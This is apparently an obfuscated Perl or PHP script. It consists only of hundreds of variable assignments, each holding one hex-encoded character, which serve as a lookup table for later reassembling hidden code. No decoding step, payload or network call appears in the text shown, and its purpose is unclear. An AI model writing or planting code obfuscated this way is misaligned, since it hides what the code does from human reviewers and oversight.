$nkc1667="\x24";
$nkc431="\x72";$nkc776="\x6e";$nkc877="\x69";$nkc878="\x70";$nkc343="\x20";$nkc1427="\x29";$nkc1332="\x29";$nkc1661="\x69";$nkc1188="\x74";$nkc1494="\x6f";$nkc737="\x5d";$nkc1064="\x24";$nkc556="\x78";$nkc688="\x25";$nkc1528="\x72";$nkc149="\x70";$nkc536="\x66";$nkc1036="\x6e";$nkc1016="\x6d";$nkc1155="\x20";$nkc829="\x63";$nkc1682="\x63";
$nkc463="\x20";
$nkc313="\x72";
$nkc159="\x63";$nkc430="\x63";$nkc48="\x53";$nkc1048="\x63";$nkc1023="\x3d";$nkc939="\x20";$nkc117="\x20";$nkc510="\x65";$nkc320="\x20";
$nkc1471="\x75";$nkc1619="\x28";$nkc1058="\x76";
$nkc1554="\x23";
$nkc1646="\x65";$nkc779="\x32";$nkc1715="\x0a";$nkc1285="\x3b";$nkc1051="\x65";$nkc775="\x61";$nkc1369="\x30";$nkc359="\x40";$nkc447="\x20";$nkc1241="\x20";$nkc188="\x20";$nkc315="\x28";$nkc1594="\x72";$nkc568="\x20";$nkc187="\x79";$nkc466="\x75";
$nkc1295="\x75";$nkc1565="\x67";$nkc815="\x6c";
$nkc898="\x20";$nkc1260="\x61";$nkc879="\x74";$nkc1679="\x3b";$nkc1268="\x6a";$nkc1125="\x0a";$nkc1207="\x6e";$nkc347="\x69";$nkc156="\x79";$nkc110="\x73";$nkc467="\x66";$nkc112="\x72";$nkc823="\x6e";$nkc1323="\x74";$nkc1074="\x22";$nkc777="\x64";$nkc574="\x76";$nkc885="\x69";$nkc1566="\x20";$nkc608="\x64";$nkc724="\x72";$nkc224="\x64";$nkc601="\x6d";$nkc405="\x2c";$nkc643="\x70";$nkc108="\x72";$nkc1040="\x27";$nkc1250="\x20";
$nkc1254="\x3b";$nkc144="\x74";$nkc511="\x20";$nkc971="\x20";$nkc387="\x29";$nkc715="\x65";
$nkc1154="\x79";$nkc1592="\x6d";$nkc129="\x65";$nkc1703="\x3b";$nkc4="\x72";
$nkc145="\x61";
$nkc436="\x61";$nkc782="\x2b";$nkc1386="\x20";$nkc454="\x6f";$nkc950="\x28";$nkc892="\x24";
$nkc1447="\x73";$nkc1236="\x24";
$nkc940="\x69";
$nkc1387="\x7b";
$nkc921="\x3b";$nkc344="\x2b";
$nkc272="\x74";$nkc1581="\x0a";$nkc1298="\x72";$nkc120="\x6c";$nkc1666="\x20";$nkc1104="\x69";
$nkc1547="\x65";$nkc1370="\x3b";$nkc1476="\x65";$nkc693="\x22";$nkc672="\x74";$nkc1096="\x0a";$nkc1052="\x20";$nkc1586="\x3d";$nkc1578="\x20";$nkc531="\x5f";$nkc713="\x65";$nkc1440="\x65";$nkc966="\x29";$nkc381="\x20";$nkc630="\x20";$nkc678="\x25";
$nkc1595="\x70";$nkc540="\x5c";$nkc464="\x73";$nkc399="\x6e";$nkc1112="\x74";$nkc1072="\x65";$nkc765="\x69";$nkc1002="\x6d";$nkc462="\x65";$nkc834="\x2e";
$nkc1333="\x2b";$nkc318="\x20";$nkc993="\x22";$nkc46="\x39";
$nkc521="\x73";$nkc1454="\x0a";
$nkc1088="\x6d";$nkc1248="\x6a";$nkc1092="\x65";$nkc566="\x20";$nkc1004="\x2e";$nkc1281="\x20";$nkc275="\x20";$nkc1487="\x6e";$nkc882="\x2b";$nkc1515="\x67";$nkc1634="\x24";$nkc476="\x74";$nkc723="\x6f";
$nkc1374="\x20";
$nkc848="\x65";$nkc542="\x73";
$nkc958="\x64";$nkc494="\x75";$nkc86="\x20";
$nkc1686="\x63";$nkc1642="\x65";$nkc278="\x61";
$nkc1503="\x23";
$nkc1404="\x72";
$nkc904="\x24";$nkc288="\x68";$nkc410="\x0a";$nkc265="\x72";$nkc799="\x09";
$nkc443="\x6b";$nkc1146="\x0a";
$nkc157="\x20";
$nkc579="\x61";$nkc1142="\x20";$nkc492="\x65";$nkc567="\x3d";$nkc299="\x74";$nkc1520="\x61";
$nkc73="\x20";$nkc1288="\x7d";$nkc557="\x65";$nkc1514="\x20";$nkc1080="\x72";$nkc1122="\x65";$nkc626="\x3d";$nkc1259="\x24";$nkc741="\x0a";$nkc1627="\x61";$nkc1538="\x65";$nkc67="\x20";
$nkc1038="\x6d";$nkc1699="\x74";
$nkc1378="\x6c";$nkc1482="\x2c";$nkc26="\x70";
$nkc615="\x3b";$nkc222="\x61";
$nkc95="\x23";$nkc1364="\x24";$nkc698="\x24";$nkc1185="\x20";$nkc1516="\x65";$nkc176="\x20";$nkc1304="\x74";
$nkc1337="\x09";$nkc362="\x72";$nkc178="\x69";$nkc727="\x24";
$nkc177="\x24";$nkc535="\x66";$nkc269="\x6f";$nkc203="\x40";$nkc826="\x09";$nkc1209="\x78";$nkc663="\x20";$nkc803="\x61";
$nkc1377="\x24";$nkc373="\x72";$nkc1431="\x29";$nkc564="\x24";$nkc456="\x20";$nkc85="\x31";$nkc417="\x23";$nkc425="\x69";$nkc154="\x09";$nkc1346="\x6e";
$nkc967="\x29";
$nkc1275="\x61";
$nkc785="\x29";$nkc506="\x20";
$nkc1033="\x61";$nkc911="\x61";$nkc784="\x29";$nkc1350="\x20";$nkc1311="\x0a";$nkc484="\x77";$nkc1090="\x6f";$nkc1433="\x3b";$nkc1045="\x09";$nkc1405="\x69";
$nkc1330="\x33";$nkc718="\x24";$nkc1362="\x79";$nkc957="\x6e";$nkc56="\x6e";$nkc1555="\x20";$nkc1655="\x22";$nkc1150="\x72";
$nkc1105="\x73";$nkc896="\x64";$nkc124="\x66";$nkc1505="\x63";
$nkc654="\x0a";
$nkc1423="\x64";$nkc753="\x20";$nkc1197="\x20";$nkc21="\x65";$nkc125="\x74";$nkc973="\x29";$nkc1014="\x09";$nkc1419="\x28";$nkc1157="\x69";$nkc624="\x69";
$nkc396="\x20";$nkc1383="\x24";$nkc1371="\x20";$nkc333="\x74";
$nkc409="\x3b";$nkc12="\x20";$nkc771="\x6e";$nkc773="\x28";$nkc975="\x0a";$nkc1018="\x6f";
$nkc633="\x20";$nkc563="\x09";$nkc1066="\x61";$nkc1089="\x63";$nkc223="\x6e";$nkc652="\x20";$nkc867="\x24";$nkc1200="\x31";$nkc134="\x65";$nkc1177="\x09";$nkc213="\x20";
$nkc306="\x69";
$nkc655="\x09";$nkc594="\x6e";$nkc666="\x20";
$nkc690="\x32";$nkc849="\x3d";$nkc667="\x73";$nkc708="\x20";$nkc1334="\x32";$nkc922="\x0a";$nkc0="\x23";$nkc912="\x6d";$nkc549="\x20";$nkc217="\x0a";$nkc1652="\x69";$nkc717="\x5b";$nkc1300="\x6e";$nkc1542="\x65";$nkc1632="\x68";$nkc1114="\x73";$nkc637="\x24";$nkc1665="\x4f";$nkc1193="\x64";$nkc769="\x28";$nkc211="\x20";$nkc1629="\x6f";$nkc1167="\x2d";$nkc1101="\x62";$nkc1265="\x2c";$nkc357="\x68";$nkc1602="\x3b";$nkc1349="\x3d";$nkc385="\x20";$nkc1191="\x61";$nkc51="\x61";$nkc152="\x7b";$nkc1517="\x6e";$nkc295="\x69";$nkc596="\x28";$nkc1027="\x24";$nkc1065="\x76";$nkc607="\x6f";$nkc264="\x72";$nkc1573="\x6e";$nkc171="\x3b";$nkc78="\x72";
$nkc1701="\x6f";$nkc1060="\x6c";$nkc165="\x20";$nkc1562="\x77";$nkc1230="\x31";
$nkc571="\x0a";
$nkc1583="\x6e";$nkc1455="\x7d";$nkc675="\x22";
$nkc1360="\x28";$nkc811="\x20";$nkc1046="\x24";$nkc1211="\x20";$nkc960="\x32";$nkc770="\x69";$nkc350="\x7b";$nkc332="\x67";$nkc1365="\x69";$nkc305="\x72";$nkc1437="\x0a";$nkc740="\x3b";$nkc821="\x72";$nkc1385="\x29";$nkc969="\x3d";$nkc1523="\x6f";$nkc1707="\x61";$nkc818="\x20";$nkc497="\x64";$nkc1548="\x2d";$nkc230="\x28";$nkc891="\x09";$nkc1368="\x20";
$nkc459="\x77";$nkc345="\x2b";$nkc857="\x20";$nkc93="\x6e";$nkc1493="\x20";$nkc1575="\x69";$nkc1609="\x20";$nkc335="\x28";$nkc1276="\x32";$nkc1689="\x0a";
$nkc686="\x5c";$nkc201="\x2c";$nkc1543="\x20";$nkc353="\x09";
$nkc1085="\x6e";$nkc1551="\x7a";
$nkc963="\x2b";$nkc360="\x73";$nkc687="\x78";$nkc748="\x64";
$nkc1172="\x29";$nkc956="\x61";$nkc1214="\x20";
$nkc1453="\x3b";
$nkc858="\x28";$nkc1097="\x0a";
$nkc450="\x61";
$nkc744="\x24";
$nkc109="\x65";$nkc949="\x20";$nkc90="\x73";$nkc552="\x69";$nkc488="\x61";$nkc1056="\x22";$nkc1674="\x6f";$nkc1020="\x65";
$nkc1504="\x20";$nkc1706="\x76";$nkc192="\x72";$nkc10="\x72";$nkc930="\x65";$nkc50="\x62";$nkc1136="\x24";$nkc1647="\x6e";$nkc24="\x6f";
$nkc141="\x20";
$nkc1212="\x69";$nkc809="\x74";$nkc835="\x3d";$nkc700="\x61";$nkc1621="\x2c";$nkc712="\x64";
$nkc702="\x5f";$nkc245="\x6f";$nkc355="\x75";$nkc204="\x69";$nkc757="\x22";$nkc1574="\x74";$nkc1552="\x65";$nkc507="\x63";$nkc186="\x6d";$nkc719="\x69";$nkc1518="\x65";$nkc369="\x75";
$nkc1012="\x0a";$nkc1435="\x09";$nkc816="\x28";$nkc554="\x64";$nkc1184="\x3d";$nkc1005="\x24";$nkc247="\x29";$nkc1232="\x24";$nkc1408="\x66";$nkc1223="\x3b";
$nkc1301="\x64";$nkc928="\x6f";$nkc890="\x09";$nkc1175="\x0a";$nkc673="\x66";$nkc1468="\x72";
$nkc1108="\x72";$nkc1160="\x20";
$nkc23="\x6d";$nkc577="\x5f";$nkc987="\x2e";$nkc138="\x73";$nkc495="\x69";
$nkc869="\x20";
$nkc1309="\x0a";$nkc664="\x2e";$nkc537="\x6c";$nkc1663="\x74";
$nkc705="\x6d";$nkc35="\x69";$nkc468="\x66";$nkc870="\x3c";$nkc1638="\x5f";$nkc738="\x29";$nkc59="\x72";$nkc1658="\x0a";$nkc735="\x24";
$nkc1338="\x6d";
$nkc825="\x0a";
$nkc395="\x68";$nkc845="\x6e";$nkc1171="\x3b";$nkc356="\x73";$nkc999="\x5f";$nkc810="\x65";$nkc780="\x30";$nkc432="\x69";$nkc961="\x30";
$nkc502="\x72";$nkc1657="\x3b";$nkc1628="\x6d";$nkc681="\x64";
$nkc1034="\x72";$nkc323="\x20";$nkc81="\x69";$nkc827="\x24";
$nkc747="\x6f";$nkc1448="\x74";$nkc1644="\x24";$nkc709="\x24";$nkc1341="\x24";$nkc1710="\x24";$nkc1601="\x29";
$nkc207="\x65";
$nkc730="\x72";$nkc404="\x73";$nkc17="\x20";$nkc1501="\x6e";$nkc168="\x69";$nkc1491="\x6f";$nkc33="\x6e";$nkc734="\x5b";
$nkc1340="\x20";$nkc1630="\x72";$nkc413="\x0a";$nkc63="\x65";$nkc627="\x20";$nkc98="\x6c";$nkc749="\x65";$nkc897="\x65";$nkc1264="\x69";$nkc434="\x74";$nkc1696="\x65";$nkc872="\x24";
$nkc183="\x3b";$nkc285="\x73";$nkc479="\x6d";$nkc1705="\x65";$nkc938="\x22";$nkc1673="\x6c";$nkc505="\x74";$nkc1702="\x6e";$nkc162="\x65";$nkc471="\x64";$nkc1401="\x20";$nkc895="\x6f";$nkc1348="\x20";$nkc68="\x63";$nkc1645="\x67";$nkc1262="\x5b";
$nkc1041="\x3b";
$nkc1526="\x20";$nkc1237="\x6a";$nkc234="\x24";$nkc841="\x76";$nkc1697="\x72";$nkc1053="\x2e";$nkc965="\x29";
$nkc1245="\x31";$nkc143="\x65";$nkc380="\x2c";
$nkc1049="\x6f";$nkc629="\x3b";$nkc1314="\x79";$nkc619="\x6f";$nkc1043="\x3b";$nkc1327="\x6e";$nkc578="\x6e";$nkc30="\x67";$nkc1351="\x22";$nkc1084="\x72";$nkc1242="\x40";$nkc553="\x6e";$nkc58="\x4b";$nkc573="\x24";$nkc1082="\x74";
$nkc746="\x63";$nkc1549="\x73";$nkc756="\x6e";$nkc1616="\x70";$nkc704="\x61";$nkc888="\x7b";$nkc1194="\x28";$nkc209="\x65";$nkc1228="\x24";$nkc1123="\x0a";$nkc1436="\x7d";$nkc750="\x20";$nkc696="\x2c";$nkc583="\x3d";
$nkc337="\x63";$nkc1000="\x6e";$nkc1584="\x63";$nkc66="\x23";$nkc1529="\x20";$nkc412="\x7d";$nkc1654="\x6e";$nkc918="\x69";
$nkc102="\x69";$nkc135="\x64";$nkc1633="\x2d";$nkc106="\x73";$nkc1664="\x20";
$nkc943="\x28";$nkc840="\x24";$nkc1017="\x63";$nkc668="\x70";$nkc986="\x20";$nkc1129="\x20";$nkc1169="\x24";$nkc789="\x3d";$nkc1273="\x40";$nkc830="\x6f";$nkc933="\x3d";
$nkc1509="\x75";$nkc1432="\x29";$nkc1231="\x5b";$nkc518="\x09";
$nkc856="\x72";$nkc1302="\x5f";$nkc927="\x63";$nkc258="\x64";$nkc239="\x6e";$nkc71="\x73";$nkc1359="\x20";$nkc1477="\x20";$nkc1353="\x3b";$nkc1700="\x69";$nkc1217="\x20";$nkc1512="\x20";$nkc1589="\x65";$nkc1511="\x65";$nkc310="\x09";
$nkc1570="\x6f";$nkc766="\x20";$nkc995="\x24";$nkc105="\x74";$nkc226="\x74";$nkc97="\x41";$nkc1563="\x69";$nkc259="\x20";$nkc1653="\x6f";$nkc517="\x0a";$nkc628="\x30";$nkc1="\x20";$nkc1174="\x7b";
$nkc429="\x73";$nkc445="\x65";
$nkc1297="\x20";$nkc422="\x64";
$nkc1648="\x65";$nkc500="\x6f";$nkc131="\x65";$nkc263="\x61";$nkc871="\x20";$nkc1240="\x3d";$nkc175="\x79";$nkc57="\x20";$nkc839="\x24";$nkc1588="\x6d";$nkc1355="\x09";$nkc861="\x20";
$nkc546="\x70";$nkc1148="\x66";$nkc1357="\x6f";$nkc1274="\x24";
$nkc197="\x3d";$nkc220="\x73";
$nkc902="\x22";$nkc1572="\x65";$nkc1019="\x64";$nkc1553="\x0a";$nkc1244="\x61";$nkc1469="\x65";$nkc1460="\x74";$nkc330="\x65";$nkc935="\x22";$nkc7="\x70";$nkc1322="\x6e";$nkc482="\x6f";$nkc1577="\x6c";$nkc736="\x69";$nkc1502="\x0a";$nkc1284="\x5d";
$nkc1128="\x79";$nkc1458="\x23";$nkc887="\x20";$nkc1164="\x31";$nkc118="\x61";$nkc1335="\x3b";
$nkc384="\x2c";$nkc54="\x69";
$nkc981="\x6d";$nkc526="\x79";$nkc1541="\x68";$nkc1396="\x6e";$nkc1339="\x79";
$nkc706="\x65";
$nkc903="\x5c";$nkc614="\x22";$nkc370="\x62";$nkc763="\x28";
$nkc701="\x72";$nkc233="\x24";
$nkc1531="\x6f";$nkc545="\x69";$nkc551="\x40";$nkc457="\x68";
$nkc1234="\x2c";$nkc1354="\x0a";
$nkc793="\x3b";$nkc1267="\x24";$nkc294="\x75";$nkc1316="\x24";$nkc148="\x72";$nkc1326="\x61";$nkc364="\x70";$nkc604="\x24";$nkc1009="\x3b";$nkc1303="\x73";
$nkc297="\x64";$nkc1107="\x65";
$nkc1287="\x09";$nkc403="\x65";$nkc1539="\x20";$nkc828="\x6d";
$nkc292="\x20";
$nkc1527="\x6f";$nkc543="\x63";$nkc620="\x72";$nkc597="\x29";$nkc592="\x72";$nkc1467="\x20";$nkc308="\x74";$nkc622="\x28";
$nkc229="\x65";$nkc1001="\x61";$nkc273="\x68";
$nkc1384="\x69";$nkc349="\x20";$nkc179="\x20";$nkc832="\x65";
$nkc1131="\x24";$nkc1081="\x65";$nkc451="\x63";$nkc38="\x20";$nkc1558="\x20";$nkc1470="\x63";$nkc1617="\x65";$nkc538="\x65";$nkc1094="\x0a";$nkc1153="\x6d";$nkc440="\x79";$nkc859="\x24";$nkc613="\x22";$nkc1331="\x29";$nkc539="\x28";$nkc1486="\x61";$nkc677="\x24";$nkc1342="\x73";$nkc1186="\x69";$nkc1061="\x20";$nkc1176="\x09";$nkc1291="\x0a";
$nkc1070="\x61";$nkc237="\x67";
$nkc925="\x24";$nkc1532="\x2c";$nkc1496="\x6c";$nkc1225="\x09";$nkc53="\x74";$nkc1173="\x20";$nkc889="\x0a";$nkc743="\x09";$nkc1407="\x74";$nkc388="\x3b";$nkc593="\x69";$nkc1095="\x7d";$nkc418="\x20";$nkc199="\x28";$nkc1141="\x3d";$nkc485="\x65";$nkc523="\x65";
$nkc671="\x6e";
$nkc189="\x40";$nkc458="\x6f";
$nkc1296="\x62";$nkc191="\x63";$nkc240="\x65";$nkc1545="\x6f";$nkc941="\x66";$nkc298="\x20";$nkc516="\x72";$nkc1521="\x74";$nkc268="\x20";$nkc32="\x65";$nkc962="\x29";$nkc1098="\x0a";
$nkc1382="\x2b";$nkc1306="\x69";$nkc631="\x24";$nkc942="\x20";
$nkc1126="\x09";$nkc836="\x20";$nkc481="\x73";$nkc1318="\x20";$nkc590="\x73";$nkc1218="\x3d";$nkc561="\x0a";$nkc1631="\x70";
$nkc805="\x63";
$nkc1075="\x3b";$nkc1450="\x69";$nkc842="\x61";
$nkc1320="\x20";$nkc490="\x20";$nkc1145="\x3b";$nkc1138="\x32";$nkc65="\x0a";$nkc75="\x65";$nkc754="\x22";$nkc358="\x20";
$nkc155="\x6d";$nkc1600="\x63";$nkc340="\x65";$nkc1054="\x3d";$nkc1139="\x29";$nkc261="\x6e";
$nkc365="\x74";$nkc520="\x69";$nkc366="\x2c";$nkc1490="\x79";$nkc254="\x62";$nkc1324="\x28";$nkc996="\x76";
$nkc1478="\x63";$nkc411="\x09";$nkc1637="\x72";$nkc529="\x65";$nkc1412="\x63";
$nkc91="\x69";$nkc595="\x67";
$nkc1069="\x6e";
$nkc1270="\x20";$nkc1278="\x24";$nkc970="\x3d";$nkc612="\x20";$nkc683="\x5c";
$nkc1651="\x74";$nkc504="\x63";$nkc1464="\x20";$nkc642="\x69";$nkc1261="\x32";$nkc1495="\x6e";
$nkc1579="\x3a";$nkc231="\x29";$nkc1614="\x0a";$nkc1213="\x66";
$nkc238="\x65";$nkc881="\x20";$nkc901="\x20";$nkc1039="\x65";$nkc524="\x72";$nkc1110="\x79";$nkc1168="\x2d";$nkc1659="\x70";
$nkc560="\x3b";$nkc900="\x3d";
$nkc1599="\x24";$nkc1390="\x09";$nkc860="\x69";$nkc290="\x63";$nkc338="\x6f";$nkc132="\x72";$nkc1678="\x4f";$nkc519="\x66";
$nkc1116="\x73";$nkc5="\x65";
$nkc714="\x78";$nkc640="\x63";$nkc634="\x3c";$nkc1445="\x20";$nkc1422="\x6e";$nkc1426="\x30";$nkc854="\x66";$nkc377="\x6f";
$nkc398="\x69";$nkc648="\x2b";
$nkc20="\x64";$nkc122="\x6c";$nkc1535="\x69";$nkc1676="\x65";$nkc83="\x6e";$nkc1215="\x24";$nkc257="\x6c";$nkc1247="\x24";
$nkc253="\x20";$nkc496="\x6c";
$nkc899="\x2e";$nkc1430="\x37";
$nkc2="\x6d";$nkc833="\x20";$nkc486="\x20";$nkc1199="\x20";$nkc1625="\x65";$nkc978="\x0a";$nkc1414="\x2c";$nkc1183="\x20";$nkc1424="\x28";$nkc657="\x24";$nkc382="\x24";$nkc894="\x63";$nkc1059="\x61";$nkc1550="\x69";$nkc1204="\x0a";$nkc733="\x74";$nkc716="\x73";$nkc1675="\x73";
$nkc555="\x65";$nkc407="\x24";$nkc142="\x6d";$nkc670="\x69";
$nkc1221="\x24";$nkc1161="\x40";$nkc1429="\x39";$nkc1561="\x6f";$nkc1656="\x29";$nkc346="\x24";
$nkc1452="\x67";$nkc808="\x61";$nkc761="\x20";$nkc158="\x24";$nkc954="\x28";
$nkc661="\x64";$nkc1224="\x0a";$nkc1525="\x73";$nkc1428="\x2b";$nkc196="\x20";$nkc945="\x24";$nkc389="\x0a";$nkc424="\x6d";$nkc503="\x65";$nkc691="\x78";$nkc722="\x20";$nkc153="\x0a";$nkc6="\x2d";$nkc1222="\x6a";$nkc406="\x20";$nkc1536="\x6e";
$nkc1115="\x5f";
$nkc472="\x0a";$nkc1610="\x24";$nkc1483="\x20";
$nkc1465="\x69";$nkc1180="\x20";$nkc1714="\x0a";$nkc974="\x3b";$nkc1347="\x67";$nkc376="\x63";$nkc1708="\x6c";$nkc1635="\x76";$nkc62="\x6d";$nkc72="\x74";
$nkc530="\x73";$nkc317="\x69";$nkc427="\x65";$nkc1425="\x32";$nkc1485="\x65";
$nkc1373="\x69";$nkc1078="\x0a";$nkc55="\x61";$nkc947="\x20";
$nkc77="\x65";$nkc1611="\x6e";$nkc1576="\x61";$nkc662="\x65";$nkc242="\x61";$nkc397="\x40";
$nkc1639="\x6e";$nkc742="\x09";$nkc375="\x24";$nkc303="\x73";$nkc1533="\x20";
$nkc190="\x73";
$nkc909="\x5f";$nkc674="\x28";$nkc1499="\x63";$nkc270="\x66";
$nkc255="\x75";$nkc695="\x22";
$nkc139="\x75";$nkc795="\x09";$nkc1417="\x6e";$nkc446="\x70";$nkc367="\x20";$nkc1258="\x40";$nkc146="\x6d";$nkc572="\x09";$nkc1439="\x72";$nkc1694="\x65";$nkc758="\x20";$nkc342="\x3b";$nkc210="\x73";$nkc1252="\x69";$nkc1683="\x3d";$nkc465="\x68";
$nkc123="\x65";$nkc817="\x29";$nkc794="\x0a";$nkc1239="\x20";
$nkc1343="\x74";$nkc1612="\x63";$nkc1015="\x24";$nkc814="\x61";$nkc541="\x40";$nkc728="\x73";$nkc439="\x61";$nkc968="\x20";$nkc1305="\x72";$nkc639="\x73";
$nkc1691="\x2b";$nkc977="\x7d";$nkc326="\x20";$nkc1698="\x61";
$nkc96="\x20";
$nkc1024="\x20";$nkc1068="\x5f";$nkc1598="\x24";$nkc1151="\x20";$nkc164="\x3d";
$nkc1196="\x69";$nkc11="\x6c";
$nkc1266="\x20";
$nkc1007="\x2e";$nkc617="\x09";$nkc621="\x20";$nkc27="\x68";$nkc864="\x30";$nkc1456="\x0a";$nkc509="\x64";$nkc9="\x61";$nkc477="\x68";$nkc649="\x24";$nkc997="\x61";
$nkc394="\x73";$nkc379="\x65";$nkc1249="\x2c";$nkc371="\x73";$nkc1021="\x20";$nkc136="\x2e";
$nkc286="\x20";$nkc61="\x68";
$nkc281="\x63";$nkc1489="\x20";$nkc74="\x67";$nkc1568="\x78";$nkc119="\x6c";$nkc1421="\x61";
$nkc1406="\x6e";$nkc1099="\x73";$nkc946="\x69";$nkc512="\x6c";$nkc34="\x67";
$nkc225="\x28";$nkc682="\x3d";$nkc363="\x69";$nkc820="\x74";$nkc934="\x20";
$nkc1544="\x63";$nkc569="\x30";$nkc1086="\x20";$nkc205="\x6e";$nkc283="\x65";$nkc274="\x65";$nkc499="\x63";$nkc985="\x65";$nkc455="\x6e";$nkc301="\x65";$nkc948="\x25";
$nkc1206="\x09";$nkc433="\x70";$nkc1613="\x3b";$nkc324="\x24";$nkc421="\x6e";$nkc408="\x69";
$nkc1192="\x6e";$nkc1668="\x6e";$nkc778="\x28";$nkc121="\x20";
$nkc656="\x09";$nkc115="\x64";$nkc126="\x73";$nkc689="\x30";
$nkc584="\x20";$nkc1488="\x73";$nkc14="\x65";
$nkc1325="\x72";
$nkc228="\x6d";
$nkc1293="\x0a";$nkc645="\x3b";$nkc547="\x74";$nkc1606="\x69";$nkc786="\x29";$nkc216="\x3b";
$nkc13="\x50";$nkc1286="\x0a";$nkc282="\x74";
$nkc235="\x2a";$nkc420="\x61";$nkc1623="\x3e";$nkc1372="\x24";$nkc1394="\x72";$nkc321="\x30";$nkc1238="\x5d";$nkc875="\x63";$nkc638="\x23";$nkc528="\x74";
$nkc1310="\x7b";$nkc1243="\x24";$nkc1312="\x09";
$nkc1398="\x20";$nkc838="\x5c";$nkc1393="\x74";$nkc1147="\x09";$nkc1479="\x6f";$nkc1704="\x0a";$nkc314="\x20";$nkc514="\x74";$nkc751="\x2e";$nkc232="\x25";
$nkc585="\x72";$nkc393="\x75";$nkc893="\x6d";$nkc990="\x22";
$nkc1557="\x73";$nkc461="\x77";$nkc1013="\x0a";$nkc660="\x6f";$nkc876="\x72";$nkc1158="\x20";$nkc41="\x29";$nkc1071="\x6d";$nkc1055="\x20";$nkc166="\x73";$nkc1409="\x28";$nkc243="\x74";$nkc873="\x23";$nkc994="\x2e";$nkc1178="\x6d";$nkc1165="\x3b";$nkc847="\x6d";$nkc694="\x3b";$nkc1513="\x34";$nkc1133="\x31";$nkc1463="\x73";$nkc1556="\x69";$nkc783="\x31";
$nkc650="\x69";
$nkc1618="\x6e";$nkc929="\x64";$nkc725="\x64";$nkc438="\x72";
$nkc1712="\x63";$nkc361="\x63";$nkc605="\x6d";$nkc1379="\x3b";$nkc917="\x24";$nkc1003="\x65";
$nkc984="\x64";$nkc1593="\x6f";$nkc1135="\x20";$nkc602="\x79";$nkc195="\x74";$nkc1106="\x68";$nkc1030="\x27";$nkc926="\x6d";$nkc3="\x6f";$nkc1669="\x63";
$nkc837="\x22";$nkc710="\x69";$nkc953="\x74";$nkc932="\x2e";$nkc271="\x20";$nkc576="\x72";$nkc603="\x20";$nkc215="\x29";$nkc172="\x0a";$nkc319="\x3d";$nkc252="\x23";$nkc726="\x28";$nkc1117="\x68";
$nkc84="\x2d";$nkc976="\x09";$nkc1352="\x22";$nkc8="\x65";
$nkc1149="\x6f";$nkc1410="\x22";$nkc992="\x24";
$nkc1451="\x6e";$nkc533="\x68";$nkc435="\x20";$nkc760="\x66";$nkc581="\x65";$nkc284="\x72";$nkc1358="\x72";$nkc1008="\x22";
$nkc378="\x64";$nkc1277="\x5b";
$nkc587="\x6e";$nkc348="\x29";$nkc591="\x74";$nkc1073="\x3b";$nkc1681="\x24";$nkc924="\x09";$nkc680="\x25";$nkc428="\x20";$nkc1026="\x5c";$nkc586="\x61";
$nkc100="\x20";$nkc327="\x3c";$nkc863="\x20";$nkc493="\x62";$nkc1263="\x24";$nkc498="\x20";
$nkc1376="\x20";$nkc279="\x72";$nkc632="\x69";$nkc868="\x69";
$nkc1235="\x20";$nkc1256="\x09";
$nkc1137="\x61";$nkc312="\x6f";$nkc883="\x2b";$nkc169="\x66";$nkc1672="\x63";$nkc160="\x6f";$nkc752="\x3d";$nkc772="\x74";$nkc1111="\x61";
$nkc1134="\x2c";$nkc1010="\x22";$nkc1119="\x66";$nkc173="\x09";$nkc1118="\x75";$nkc729="\x63";$nkc843="\x72";$nkc208="\x78";$nkc1229="\x61";$nkc980="\x24";$nkc732="\x70";$nkc1400="\x3d";$nkc558="\x73";$nkc1166="\x20";$nkc806="\x75";$nkc1032="\x76";$nkc1087="\x24";
$nkc94="\x0a";$nkc851="\x3b";
$nkc1289="\x0a";$nkc781="\x29";
$nkc200="\x29";$nkc18="\x63";$nkc22="\x20";$nkc276="\x63";$nkc1564="\x6e";$nkc1524="\x6e";$nkc1449="\x72";$nkc919="\x2e";$nkc293="\x62";$nkc989="\x20";
$nkc478="\x65";$nkc711="\x6e";$nkc236="\x24";$nkc1446="\x24";$nkc1590="\x74";$nkc147="\x6f";$nkc1282="\x24";$nkc1662="\x6e";$nkc392="\x70";$nkc311="\x66";$nkc331="\x6e";$nkc244="\x69";$nkc1636="\x61";$nkc291="\x68";$nkc589="\x5f";$nkc1402="\x73";$nkc180="\x3d";$nkc1156="\x24";
$nkc1255="\x0a";$nkc241="\x72";$nkc1484="\x6d";$nkc80="\x74";
$nkc89="\x72";$nkc416="\x09";$nkc1392="\x73";$nkc1640="\x61";
$nkc1152="\x28";$nkc133="\x73";$nkc1522="\x69";$nkc1443="\x72";$nkc1159="\x3d";$nkc1650="\x61";
$nkc1189="\x28";$nkc287="\x77";$nkc1321="\x69";$nkc351="\x0a";
$nkc703="\x6e";$nkc37="\x65";
$nkc426="\x7a";$nkc99="\x6c";
$nkc788="\x3d";$nkc515="\x65";$nkc1328="\x64";$nkc341="\x29";
$nkc755="\x5c";$nkc1216="\x69";$nkc955="\x72";$nkc249="\x0a";
$nkc1438="\x09";$nkc1345="\x69";$nkc402="\x78";$nkc1540="\x74";$nkc707="\x2c";$nkc598="\x3b";$nkc988="\x3d";$nkc822="\x69";$nkc813="\x76";$nkc419="\x72";$nkc582="\x20";
$nkc1047="\x6d";$nkc262="\x20";$nkc1620="\x4f";$nkc49="\x65";$nkc1308="\x67";
$nkc1685="\x6e";$nkc267="\x79";$nkc1441="\x74";$nkc304="\x63";$nkc865="\x3b";$nkc1283="\x69";$nkc874="\x73";$nkc910="\x6e";$nkc163="\x20";$nkc1420="\x72";$nkc915="\x2e";$nkc831="\x64";$nkc1028="\x63";$nkc161="\x64";
$nkc1233="\x69";$nkc1190="\x72";$nkc651="\x29";$nkc442="\x20";$nkc599="\x0a";$nkc453="\x20";$nkc1481="\x65";$nkc1210="\x74";$nkc386="\x31";
$nkc937="\x6e";$nkc137="\x0a";$nkc525="\x5f";$nkc1442="\x75";$nkc1042="\x22";
$nkc256="\x69";$nkc214="\x28";$nkc1272="\x20";$nkc1329="\x28";$nkc1519="\x72";$nkc1113="\x65";$nkc739="\x29";$nkc534="\x75";$nkc616="\x0a";$nkc444="\x65";$nkc1181="\x24";$nkc1307="\x6e";$nkc1375="\x3c";$nkc886="\x29";$nkc29="\x6e";$nkc1418="\x74";$nkc354="\x70";
$nkc322="\x3b";$nkc39="\x28";$nkc1603="\x0a";$nkc764="\x24";$nkc1077="\x09";
$nkc768="\x20";$nkc1587="\x20";$nkc998="\x72";$nkc1336="\x0a";$nkc1227="\x40";$nkc1546="\x64";$nkc906="\x76";$nkc15="\x72";$nkc1367="\x3d";
$nkc959="\x28";
$nkc1480="\x64";
